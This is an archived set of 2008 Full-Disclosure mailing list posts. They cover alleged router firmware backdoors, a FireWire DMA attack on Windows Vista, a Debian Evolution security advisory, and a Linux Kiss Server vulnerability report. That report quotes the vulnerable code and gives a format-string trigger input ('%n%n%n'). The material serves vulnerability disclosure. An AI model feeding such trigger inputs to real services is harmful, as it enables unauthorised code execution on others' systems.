<8f1f7b60803051850v71805a65lb5d8fd4919b21df8@mail.gmail.com> Operation infrastrcuture http://www.cbp.gov/xp/cgov/newsroom/news_releases/02222008.xml On Wed, Mar 5, 2008 at 8:47 PM, Times Enemy wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > > It is not too far fetched of an idea. Google yielded the following > fairly quick: http://slashdot.org/articles/08/02/29/1642221.shtml > > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080305/ea62f2db/attachment.html From times at krr.org Thu Mar 6 02:56:41 2008 From: times at krr.org (Times Enemy) Date: Wed, 05 Mar 2008 19:56:41 -0700 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> <0273B67044957C41BD71D12EBA2E00AE252EF2@becca.LarrySeltzer.local> <47CF4D40.1000107@krr.org> Message-ID: <47CF5D69.6000309@krr.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Greetings. I agree, that the threat does not stop at firmware for routers and switches. Even with open source, or dare i type, even more so with open source, the threat for maliciously modified code exists. This is not a new threat, per se, however, it is a growing threat which is fed by more and more hardware being built/assembled/manufactured/what-have-you in questionable countries/locations. This is not isolated to the far east, though the far east is a perfectly legitimate location for western users to NOT trust. I would venture to state that eastern users have already accepted that their products may have gone 1984 on them. It does not give me warm fuzzies that the way the vast majority of production appears, at least one part of most gizmos comes through the far east. Without question, a security concern. .te quispiam lepidus wrote: | Why stop at routers & switches? You could own far more devices by | backdooring BIOS', HDD's, etc, all of which are often produced in "Far East | countries". | | | On Thu, Mar 6, 2008 at 12:47 PM, Times Enemy wrote: | | Greets. | | It does not matter so much if there is no hard proof about the router | firmware containing backdoors set in place by Chinese manufacturers. | ~From a security perspective, it is a potential threat which should be | addressed, especially for western networks and those they trust. | | It is not too far fetched of an idea. Google yielded the following | fairly quick: http://slashdot.org/articles/08/02/29/1642221.shtml | | If you want to be inundated with reading material on the matter, be | creative, or not too creative, with Google searches having to do with | China and western powers and businesses, specific to information warfare. | | .te | | | Larry Seltzer wrote: | |>> Next we'll be seeing "Japanese tactical nukes "Hidden in Toyota | | trunks" | | | | And who knows what the French are putting in that cheese. | | Larry Seltzer | | eWEEK.com Security Center Editor | | http://security.eweek.com/ | | | | http://blogs.pcmag.com/securitywatch/ | | | | Contributing Editor, PC Magazine | | larry.seltzer at ziffdavisenterprise.com -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkfPXWkACgkQVuM8PD1UnspGaACeIRRRYubyJOSXuWSwQdoLyqlJ A1EAnAtBAlGyGIXOMk3OyEcHhpRi+hdN =jaFt -----END PGP SIGNATURE----- From them.root at gmail.com Thu Mar 6 03:06:28 2008 From: them.root at gmail.com (TheM .) Date: Wed, 5 Mar 2008 22:06:28 -0500 Subject: [Full-disclosure] Firewire Attack on Windows Vista In-Reply-To: <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> Message-ID: <96774a650803051906y994ac78qd5b883cf62892f62@mail.gmail.com> I believe their work is an expansion of this: http://www.theage.com.au/news/security/hack-into-a-windows-pc-no-password-needed/2008/03/04/1204402423638.html, which demonstrated the vuln. in XP (and, according to the paper, it's been demonstrated with other OS's as well), and their work was specifically done on showing the problem in Vista, which hadn't (as far as the paper writer seems to know) been done before. Maus On Wed, Mar 5, 2008 at 4:30 PM, Roger A. Grimes wrote: > As somewhat indicated in the paper itself, these types of physical DMA > attacks are possible against any PC-based OS, not just Windows. If that's > true, why is the paper titled around Windows Vista? > > I guess it makes headlines faster. But isn't as important, if not more > important, to say all PC-based systems have the same underlying problem? > That it's a broader problem needing a broader solution, instead of picking > on one OS vendor to get headlines? > > [Disclaimer: I'm a full-time Microsoft employee.] > > Roger > > ***************************************************************** > *Roger A. Grimes, InfoWorld, Security Columnist > *CPA, CISSP, CISA, MCSE: Security (2000/2003), CEH, yada...yada... > *email: roger_grimes at infoworld.com or roger at banneretcs.com > *Author of Windows Vista Security: Securing Vista Against Malicious > Attacks (Wiley) > * > http://www.amazon.com/Windows-Vista-Security-Securing-Malicious/dp/0470101555 > ***************************************************************** > > > -----Original Message----- > From: Bernhard Mueller [mailto:research at sec-consult.com] > Sent: Wednesday, March 05, 2008 10:54 AM > To: Full Disclosure; Bugtraq > Subject: Firewire Attack on Windows Vista > > Hello, > > In the light of recent discussions about firewire / DMA hacks, we would > like to throw in some of the results of our past research on this topic > (done mainly by Peter Panholzer) in the form of a short whitepaper. In this > paper, we demonstrate that the firewire unlock attack (as implemented in > Adam Boileau?s winlockpwn) can be used against Windows Vista. > > The paper is available at: > > > http://www.sec-consult.com/fileadmin/Whitepapers/Vista_Physical_Attacks.pdf > > > Best regards, > > Bernhard > > > -- > _________________________________________ > > Bernhard Mueller > Security Consultant > > SEC Consult Unternehmensberatung GmbH > www.sec-consult.com > > A-1190 Vienna, Mooslackengasse 17 > phone +43 1 8903043 34 > fax +43 1 8903043 15 > mobile +43 676 840301 718 > email b.mueller at sec-consult.com > > Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223 > Firmensitz: Prof. Dr. Stephan Korenstra?e 10, A-2700 Wiener Neustadt > > Advisor for your information security. > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080305/bd8a19e6/attachment.html From thijs at debian.org Wed Mar 5 14:43:46 2008 From: thijs at debian.org (Thijs Kinkhorst) Date: Wed, 5 Mar 2008 15:43:46 +0100 (CET) Subject: [Full-disclosure] [SECURITY] [DSA 1512-1] New evolution packages fix arbitrary code execution Message-ID: <20080305144346.7E8DC326C4B@morgana.loeki.tv> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1512-1 security at debian.org http://www.debian.org/security/ Thijs Kinkhorst March 05, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : evolution Vulnerability : format string attack Problem type : remote Debian-specific: no CVE Id(s) : CVE-2008-0072 Ulf H??rnhammar discovered that Evolution, the e-mail and groupware suite, had a format string vulnerability in the parsing of encrypted mail messages. If the user opened a specially crafted email message, code execution was possible. For the stable distribution (etch), this problem has been fixed in version 2.6.3-6etch2. For the old stable distribution (sarge), this problem has been fixed in version 2.0.4-2sarge3. Some architectures have not yet completed building the updated package for sarge at this time, they will be added as they come available. For the unstable distribution (sid), this problem has been fixed in version 2.12.3-1.1. We recommend that you upgrade your evolution package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/e/evolution/evolution_2.0.4-2sarge3.diff.gz Size/MD5 checksum: 294256 892634ed1c28416dea721a0ee1374d84 http://security.debian.org/pool/updates/main/e/evolution/evolution_2.0.4-2sarge3.dsc Size/MD5 checksum: 1459 e4a9b6f334108cae7550c9a0953e8e2b http://security.debian.org/pool/updates/main/e/evolution/evolution_2.0.4.orig.tar.gz Size/MD5 checksum: 20968383 d555a0b1d56f0f0b9c33c35b057f73e6 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.0.4-2sarge3_amd64.deb Size/MD5 checksum: 160454 b6f68df817e14a3c52422e4f0e810bd3 http://security.debian.org/pool/updates/main/e/evolution/evolution_2.0.4-2sarge3_amd64.deb Size/MD5 checksum: 10447584 94e37843d38106635045906d58bd9386 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.0.4-2sarge3_hppa.deb Size/MD5 checksum: 160482 947be2b50da1219d1cbcf9dab63b2280 http://security.debian.org/pool/updates/main/e/evolution/evolution_2.0.4-2sarge3_hppa.deb Size/MD5 checksum: 10596054 be4f110f1d50077b53e013d2824cc1d4 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.0.4-2sarge3_i386.deb Size/MD5 checksum: 160482 5b6f5d955d309e47fea09e97b24d7d58 http://security.debian.org/pool/updates/main/e/evolution/evolution_2.0.4-2sarge3_i386.deb Size/MD5 checksum: 10228974 6c38e3e691756beccd1ccfdba259d2a8 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/e/evolution/evolution_2.0.4-2sarge3_ia64.deb Size/MD5 checksum: 11419604 c99bb84c7a074900400e59de2b10dcce http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.0.4-2sarge3_ia64.deb Size/MD5 checksum: 160440 8887e35cc887febad15f9b6cf08694fe powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.0.4-2sarge3_powerpc.deb Size/MD5 checksum: 160488 6c9a8ba39a6bab1a47dd1da8e99a5205 http://security.debian.org/pool/updates/main/e/evolution/evolution_2.0.4-2sarge3_powerpc.deb Size/MD5 checksum: 10286504 7f5d4b747a51e9c72d1114f9bcf6a209 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.0.4-2sarge3_s390.deb Size/MD5 checksum: 160438 a6e0c9b90c90b6815fd607899aeb7583 http://security.debian.org/pool/updates/main/e/evolution/evolution_2.0.4-2sarge3_s390.deb Size/MD5 checksum: 10638988 f10525a9b20cc799c0e000c3e81738ab Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/e/evolution/evolution_2.6.3.orig.tar.gz Size/MD5 checksum: 17176288 7af880364d53b18ba72b1f85f3813c81 http://security.debian.org/pool/updates/main/e/evolution/evolution_2.6.3-6etch2.dsc Size/MD5 checksum: 2269 25a2e18e12a838535c3fd74525696fa0 http://security.debian.org/pool/updates/main/e/evolution/evolution_2.6.3-6etch2.diff.gz Size/MD5 checksum: 37993 5f7815f2c6a24f3a0c940d773cca8fb1 Architecture independent packages: http://security.debian.org/pool/updates/main/e/evolution/evolution-common_2.6.3-6etch2_all.deb Size/MD5 checksum: 10107778 003176253e4c0d64c2789c08b6dd66e9 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/e/evolution/evolution-dbg_2.6.3-6etch2_amd64.deb Size/MD5 checksum: 6503088 80524049752431123c6e6cc215fed088 http://security.debian.org/pool/updates/main/e/evolution/evolution_2.6.3-6etch2_amd64.deb Size/MD5 checksum: 2572362 40c3491023cc6a44c28b44b677469770 http://security.debian.org/pool/updates/main/e/evolution/evolution-plugins_2.6.3-6etch2_amd64.deb Size/MD5 checksum: 118116 91367407df721cef2eb5b31f13dad521 http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.6.3-6etch2_amd64.deb Size/MD5 checksum: 220264 af212fee26d899114ec8c0d636af9ea4 http://security.debian.org/pool/updates/main/e/evolution/evolution-plugins-experimental_2.6.3-6etch2_amd64.deb Size/MD5 checksum: 94940 4f1bb7f6f1586967d2f7fc238845fdc6 arm architecture (ARM) http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.6.3-6etch2_arm.deb Size/MD5 checksum: 219254 01a4c8c4bc2b7821de6659b20e92a0e5 http://security.debian.org/pool/updates/main/e/evolution/evolution-dbg_2.6.3-6etch2_arm.deb Size/MD5 checksum: 6190146 4b26686b063745de28647836fed2ea90 http://security.debian.org/pool/updates/main/e/evolution/evolution_2.6.3-6etch2_arm.deb Size/MD5 checksum: 2255242 1b74f4a729f808034495f526423c7ea1 http://security.debian.org/pool/updates/main/e/evolution/evolution-plugins-experimental_2.6.3-6etch2_arm.deb Size/MD5 checksum: 91264 fadd3bb75f6f420f017d1877e4e77e44 http://security.debian.org/pool/updates/main/e/evolution/evolution-plugins_2.6.3-6etch2_arm.deb Size/MD5 checksum: 110838 6f83e99f96620005fd227f57e68af487 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.6.3-6etch2_hppa.deb Size/MD5 checksum: 213782 f1009fafa12fad8814aa0b5ad50bf47c http://security.debian.org/pool/updates/main/e/evolution/evolution-dbg_2.6.3-6etch2_hppa.deb Size/MD5 checksum: 6436462 11af4dbe53e3f1e4780b35caeacf72fb http://security.debian.org/pool/updates/main/e/evolution/evolution_2.6.3-6etch2_hppa.deb Size/MD5 checksum: 2857208 f01092a233b3b928e3ff9f12bc335bf6 http://security.debian.org/pool/updates/main/e/evolution/evolution-plugins_2.6.3-6etch2_hppa.deb Size/MD5 checksum: 120516 13a1fbcb74d8beec5d64dace004888a7 http://security.debian.org/pool/updates/main/e/evolution/evolution-plugins-experimental_2.6.3-6etch2_hppa.deb Size/MD5 checksum: 95580 6cdbe3107c91d2801e30c97436e90aa4 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/e/evolution/evolution_2.6.3-6etch2_i386.deb Size/MD5 checksum: 2408778 318c10977b3163005ce86d25a6fbbd5d http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.6.3-6etch2_i386.deb Size/MD5 checksum: 218838 e8507655153c209a3bfb11e65e5d9d6d http://security.debian.org/pool/updates/main/e/evolution/evolution-plugins-experimental_2.6.3-6etch2_i386.deb Size/MD5 checksum: 92168 5a9902f58745a70017af6a8be0781bb3 http://security.debian.org/pool/updates/main/e/evolution/evolution-plugins_2.6.3-6etch2_i386.deb Size/MD5 checksum: 113690 ffb524935d65cc5b57a7eb3b24899a3e http://security.debian.org/pool/updates/main/e/evolution/evolution-dbg_2.6.3-6etch2_i386.deb Size/MD5 checksum: 6143092 3556d0ebf225180e0cfa0f8e61bcbb1e ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/e/evolution/evolution-plugins_2.6.3-6etch2_ia64.deb Size/MD5 checksum: 129792 372c5de0189470c2dd091641ccbc1800 http://security.debian.org/pool/updates/main/e/evolution/evolution_2.6.3-6etch2_ia64.deb Size/MD5 checksum: 3419898 d2209d01f85549fb3138132429cc0314 http://security.debian.org/pool/updates/main/e/evolution/evolution-plugins-experimental_2.6.3-6etch2_ia64.deb Size/MD5 checksum: 99694 e35321d55a12521b6bcd572ed48e325b http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.6.3-6etch2_ia64.deb Size/MD5 checksum: 213738 60ccb4b7a99438004ce57b42be023f76 http://security.debian.org/pool/updates/main/e/evolution/evolution-dbg_2.6.3-6etch2_ia64.deb Size/MD5 checksum: 6137762 84e1478a41d2a863b2e84167818142e3 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.6.3-6etch2_mips.deb Size/MD5 checksum: 220670 8a620eb5ec5247f56eef3094d1f9d2b7 http://security.debian.org/pool/updates/main/e/evolution/evolution-dbg_2.6.3-6etch2_mips.deb Size/MD5 checksum: 6615710 902001a21b48fd095880a4e16f521ee7 http://security.debian.org/pool/updates/main/e/evolution/evolution-plugins-experimental_2.6.3-6etch2_mips.deb Size/MD5 checksum: 93276 320b39a0c683153dc68f9226cc29e95d http://security.debian.org/pool/updates/main/e/evolution/evolution_2.6.3-6etch2_mips.deb Size/MD5 checksum: 2352486 bbe1b44420951fe0e407f358d67a0a24 http://security.debian.org/pool/updates/main/e/evolution/evolution-plugins_2.6.3-6etch2_mips.deb Size/MD5 checksum: 113280 dc1fac2d857056eb66ca850dd701b8f6 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/e/evolution/evolution-plugins-experimental_2.6.3-6etch2_mipsel.deb Size/MD5 checksum: 92556 9a037a486b3deac0132f225bcabaaee7 http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.6.3-6etch2_mipsel.deb Size/MD5 checksum: 213808 ad12c34cf25c343b4bb5bc1a1ec5c270 http://security.debian.org/pool/updates/main/e/evolution/evolution_2.6.3-6etch2_mipsel.deb Size/MD5 checksum: 2334122 a3a70c83bc51aa54fe6f14548ca63501 http://security.debian.org/pool/updates/main/e/evolution/evolution-plugins_2.6.3-6etch2_mipsel.deb Size/MD5 checksum: 112320 c7510452c2552b185a9d4eccc0811db2 http://security.debian.org/pool/updates/main/e/evolution/evolution-dbg_2.6.3-6etch2_mipsel.deb Size/MD5 checksum: 6484920 57d9d7045ddb263e696cb6717511e355 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/e/evolution/evolution-plugins_2.6.3-6etch2_powerpc.deb Size/MD5 checksum: 125054 725fed9a64daced20fd78bdfbe475f5a http://security.debian.org/pool/updates/main/e/evolution/evolution_2.6.3-6etch2_powerpc.deb Size/MD5 checksum: 2465966 0adffc6510e079277208350f555f1f63 http://security.debian.org/pool/updates/main/e/evolution/evolution-dbg_2.6.3-6etch2_powerpc.deb Size/MD5 checksum: 6513716 66c59b08db75c184018ce915b1e1232a http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.6.3-6etch2_powerpc.deb Size/MD5 checksum: 213790 4a6ffd87ebc1c8523986e79b2beb50c1 http://security.debian.org/pool/updates/main/e/evolution/evolution-plugins-experimental_2.6.3-6etch2_powerpc.deb Size/MD5 checksum: 99302 3f5b40706aae46d7c0620bf02a6df66c s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.6.3-6etch2_s390.deb Size/MD5 checksum: 213726 249fda940d16912cc17fb5d3c0ff1fcd http://security.debian.org/pool/updates/main/e/evolution/evolution-dbg_2.6.3-6etch2_s390.deb Size/MD5 checksum: 6397416 9aa410ab707a207d56000a97235a98b5 http://security.debian.org/pool/updates/main/e/evolution/evolution_2.6.3-6etch2_s390.deb Size/MD5 checksum: 2691100 61a7c41104aded19357ad64f1b05369c http://security.debian.org/pool/updates/main/e/evolution/evolution-plugins-experimental_2.6.3-6etch2_s390.deb Size/MD5 checksum: 94272 07cbb34ce382829898fbd57c0b794529 http://security.debian.org/pool/updates/main/e/evolution/evolution-plugins_2.6.3-6etch2_s390.deb Size/MD5 checksum: 118362 1be4d726b78ad9efab9a16b4a2ea95cf sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/e/evolution/evolution-plugins_2.6.3-6etch2_sparc.deb Size/MD5 checksum: 111248 b23db7090cc78d9be75a38c4214c94ee http://security.debian.org/pool/updates/main/e/evolution/evolution-dbg_2.6.3-6etch2_sparc.deb Size/MD5 checksum: 6018682 22883c64d15fd48d06e94ff47f6c85a9 http://security.debian.org/pool/updates/main/e/evolution/evolution-plugins-experimental_2.6.3-6etch2_sparc.deb Size/MD5 checksum: 91462 7b506ec24eb68f91642d0d33d670bfbd http://security.debian.org/pool/updates/main/e/evolution/evolution_2.6.3-6etch2_sparc.deb Size/MD5 checksum: 2375358 8b97ebe934f59044c72dcce69f7f12db http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.6.3-6etch2_sparc.deb Size/MD5 checksum: 213794 2e3bb50d5485dc3979cd07bcc7090cc9 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iQEVAwUBR86xJWz0hbPcukPfAQLq1wf/c6tLwJQv+HwPtHQYnYYC6rJ6ceYjMtZ7 xCGX/TpWnrkEuUCRhdztiAwD4GIZ8NS4LpIa0Dqep+30OhgOggz/DNa0rFin09C7 gD55GOVMLHtDaMauJ4+A1wL5HM2tGt9ItnLHuN3Mii9LmNYkyDILFySUOuVqLE3W j01YKE65TJ21808gkxYwsvSGdpdTHznJRZs5aTkNBJtSUr0KJjaTzpupwzxSV5qQ 9HNU8tIZXsFJrmW2zNJYHQF4yAy9k+u/4Lh/IpMlZhL58OB7a3AjH9GkiZYURGNP +S2U/NipW/52ezFaFBTempkbWobAeY6QB/Maf4KnitumsfBa2fyFUg== =FNuj -----END PGP SIGNATURE----- From julio at rfdslabs.com.br Thu Mar 6 02:23:57 2008 From: julio at rfdslabs.com.br (Julio Cesar Fort) Date: Wed, 05 Mar 2008 23:23:57 -0300 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" Message-ID: <47CF55BD.8090208@rfdslabs.com.br> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Quoting PC Pro article: "SecureTest believes spyware could be easily built into Asian-manufactured devices such as switches and routers, providing a simple backdoor for companies or governments in the Far East to listen in on communications." It seems someone in this security company read "Breakpoint", by Richard A. Clarke, stole his thoughts and is making claims without any proof products were actually backdoored just to gain some media attention. - -- Julio Cesar Fort Recife, PE, Brazil www.rfdslabs.com.br - computers, sex, human mind, music and more. PGP public key: http://www.rootshell.be/~sandimas/juliocesarfort.gpg -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.5 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHz1W9ySo2QtzTl10RAiRSAJwNx65oWpGDRZ4sMazHm14wrM3/dgCeLzGt Z0o6vSOdqbis9kLkM8Bce4s= =cnbG -----END PGP SIGNATURE----- From iusr.jar at gmail.com Thu Mar 6 03:38:27 2008 From: iusr.jar at gmail.com (Jerome Jar) Date: Thu, 6 Mar 2008 11:38:27 +0800 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> Message-ID: <1f2d0e290803051938t499b370dw47bece2224bb4f41@mail.gmail.com> Come on, where are the evidences? Sounds pretty much like racialism. Usually the engineers are having a hard time on even getting the routers and switches functional for mass market; there won't be any time left for them to plant well hidden backdoors. On Thu, Mar 6, 2008 at 7:09 AM, Ivan . wrote: > http://www.pcpro.co.uk/news/173883/chinese-backdoors-hidden-in-router-firmware.html > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- "Houston, we have a problem." From Valdis.Kletnieks at vt.edu Thu Mar 6 04:28:43 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Wed, 05 Mar 2008 23:28:43 -0500 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: Your message of "Thu, 06 Mar 2008 11:38:27 +0800." <1f2d0e290803051938t499b370dw47bece2224bb4f41@mail.gmail.com> References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> <1f2d0e290803051938t499b370dw47bece2224bb4f41@mail.gmail.com> Message-ID: <11508.1204777723@turing-police.cc.vt.edu> On Thu, 06 Mar 2008 11:38:27 +0800, Jerome Jar said: > Come on, where are the evidences? Sounds pretty much like racialism. > > Usually the engineers are having a hard time on even getting the > routers and switches functional for mass market; there won't be any > time left for them to plant well hidden backdoors. But that's the proof right there - the reason *why* they have so much trouble getting the damned things to work is because they have to work around the backdoors in the device... ;) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080305/d78970f5/attachment.bin From measl at mfn.org Thu Mar 6 04:32:37 2008 From: measl at mfn.org (J.A. Terranson) Date: Wed, 5 Mar 2008 22:32:37 -0600 (CST) Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: <11508.1204777723@turing-police.cc.vt.edu> References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> <1f2d0e290803051938t499b370dw47bece2224bb4f41@mail.gmail.com> <11508.1204777723@turing-police.cc.vt.edu> Message-ID: On Thu, 06 Mar 2008 11:38:27 +0800, Jerome Jar said: >> Come on, where are the evidences? Sounds pretty much like racialism. >> >> Usually the engineers are having a hard time on even getting the >> routers and switches functional for mass market; there won't be any >> time left for them to plant well hidden backdoors. > > But that's the proof right there - the reason *why* they have so much > trouble getting the damned things to work is because they have to work > around the backdoors in the device... ;) Before we blow this off with a good laugh we should all remember the back doors in other network gear. Even so-called "core equipment" (anyone remember the backdoor into the [Nortel] Shasta (later known as "BSN 5000")? Assuming that any unaudited gear has a backdoor is just common sense. -- Yours, J.A. Terranson sysadmin_at_mfn.org 0xpgp_key_mgmt_is_broken-dont_bother What religion, please tell me, tells you as a follower of that religion to occupy another country and kill its people? Please tell me. Does Christianity tell its followers to do that? Judaism, for that matter? Islam, for that matter? What prophet tells you to send 160,000 troops to another country, kill men, women, and children? You just can't wear your religion on your sleeve or just go to church. You should be truthfully religious. Mahmoud Ahmadinejad From iusr.jar at gmail.com Thu Mar 6 05:29:06 2008 From: iusr.jar at gmail.com (Jerome Jar) Date: Thu, 6 Mar 2008 13:29:06 +0800 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: <11508.1204777723@turing-police.cc.vt.edu> References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> <1f2d0e290803051938t499b370dw47bece2224bb4f41@mail.gmail.com> <11508.1204777723@turing-police.cc.vt.edu> Message-ID: <1f2d0e290803052129v69c1b65et5d80f37e508efb95@mail.gmail.com> OK, only if hidden backdoors are also part of their function specs... I have friends in a router manufacturer. Besides basic functionalities that a router must have, they usually have to deal with some ridiculous requirements from customers. Mmmm, I also start to suspect the customers *want* their backdoors ;-) On Thu, Mar 6, 2008 at 12:28 PM, wrote: > On Thu, 06 Mar 2008 11:38:27 +0800, Jerome Jar said: > > Come on, where are the evidences? Sounds pretty much like racialism. > > > > Usually the engineers are having a hard time on even getting the > > routers and switches functional for mass market; there won't be any > > time left for them to plant well hidden backdoors. > > But that's the proof right there - the reason *why* they have so much > trouble getting the damned things to work is because they have to work > around the backdoors in the device... ;) > -- "Houston, we have a problem." From peterw at usa.net Thu Mar 6 00:37:45 2008 From: peterw at usa.net (Peter Watkins) Date: Wed, 5 Mar 2008 19:37:45 -0500 Subject: [Full-disclosure] Firewire Attack on Windows Vista In-Reply-To: <096A04F511B7FD4995AE55F13824B8332F1E35@contoso>; from roger@banneretcs.com on Wed, Mar 05, 2008 at 04:30:35PM -0500 References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> Message-ID: <20080305193745.A25582@gwyn.tux.org> On Wed, Mar 05, 2008 at 04:30:35PM -0500, Roger A. Grimes wrote: > As somewhat indicated in the paper itself, these types of physical DMA attacks are possible against any PC-based OS, not just Windows. If that's true, why is the paper titled around Windows Vista? > > I guess it makes headlines faster. But isn't as important, if not more important, to say all PC-based systems have the same underlying problem? That it's a broader problem needing a broader solution, instead of picking on one OS vendor to get headlines? Roger, you should note that Adam's "Hit by a Bus" paper includes information about how Linux users can load their OS' Firewire driver in a way that should disallow physical memory DMA access, and close this attack vector. I have not yet seen anyone explain how to do the same in Windows. If there is no such option in Windows (as the Panholzer paper claims), then Microsoft deserves the negative attention. > [Disclaimer: I'm a full-time Microsoft employee.] As for "broader solutions", Microsoft is in an excellent position to help improve the situation -- maybe you could shed some light on their efforts? -Peter From david.judais at googlemail.com Wed Mar 5 21:29:53 2008 From: david.judais at googlemail.com (David Judais) Date: Wed, 5 Mar 2008 16:29:53 -0500 Subject: [Full-disclosure] Vulnerability in Linux Kiss Server v1.2 Message-ID: <66e421d70803051329n12d82a8etf4fc714258025c27@mail.gmail.com> Why isn't there a patch? > From: vashnukad at vashnukad.com > Site: http://www.vashnukad.com Application: Linux Kiss Server v1.2 Type: Format strings Priority: Medium Patch available: No The Linux Kiss Server contains a format strings vulnerability that, if run in foreground mode, can be leveraged for access. The vulnerability is demonstrated in the code below: Function log_message(): if(background_mode == 0) { if(type == 'l') fprintf(stdout,log_msg); if(type == 'e') fprintf(stderr,log_msg); free(log_msg); } Function kiss_parse_cmd(): /* check full command name */ if (strncmp(cmd, buf, cmd_len)) { asprintf(&log_msg,"unknow command: `%s'", buf); log_message(log_msg,'e'); goto error; } buf += cmd_len; So putting something like %n%n%n in 'buf' you can trigger the vulnerability. -- Name: Vashnukad E-mail: vashnukad at vashnukad.com Site: http://www.vashnukad.com -- Name: Vashnukad e-mail: vashnukad at vashnukad.com Site: http://www.vashnukad.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080305/12530515/attachment.html From doconnor at gsoft.com.au Thu Mar 6 00:57:58 2008 From: doconnor at gsoft.com.au (Daniel O'Connor) Date: Thu, 6 Mar 2008 11:27:58 +1030 Subject: [Full-disclosure] Firewire Attack on Windows Vista In-Reply-To: <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> Message-ID: <200803061128.06072.doconnor@gsoft.com.au> On Thu, 6 Mar 2008, Roger A. Grimes wrote: > As somewhat indicated in the paper itself, these types of physical > DMA attacks are possible against any PC-based OS, not just Windows. > If that's true, why is the paper titled around Windows Vista? > > I guess it makes headlines faster. But isn't as important, if not > more important, to say all PC-based systems have the same underlying > problem? That it's a broader problem needing a broader solution, > instead of picking on one OS vendor to get headlines? Well it IS a new kid on the block, other systems have already had this problem reported.. It would certainly be more interesting if Vista wasn't vulnerable though :) That said, according to the fwohci source in FreeBSD you have to explicitly enable this feature and the fwohci man page says it is mandatory for SBP. It would not be too difficult to disable it by default unless and SBP device is in use. Even in that case it is apparently possible to limit the access granted to a particular device (eg only 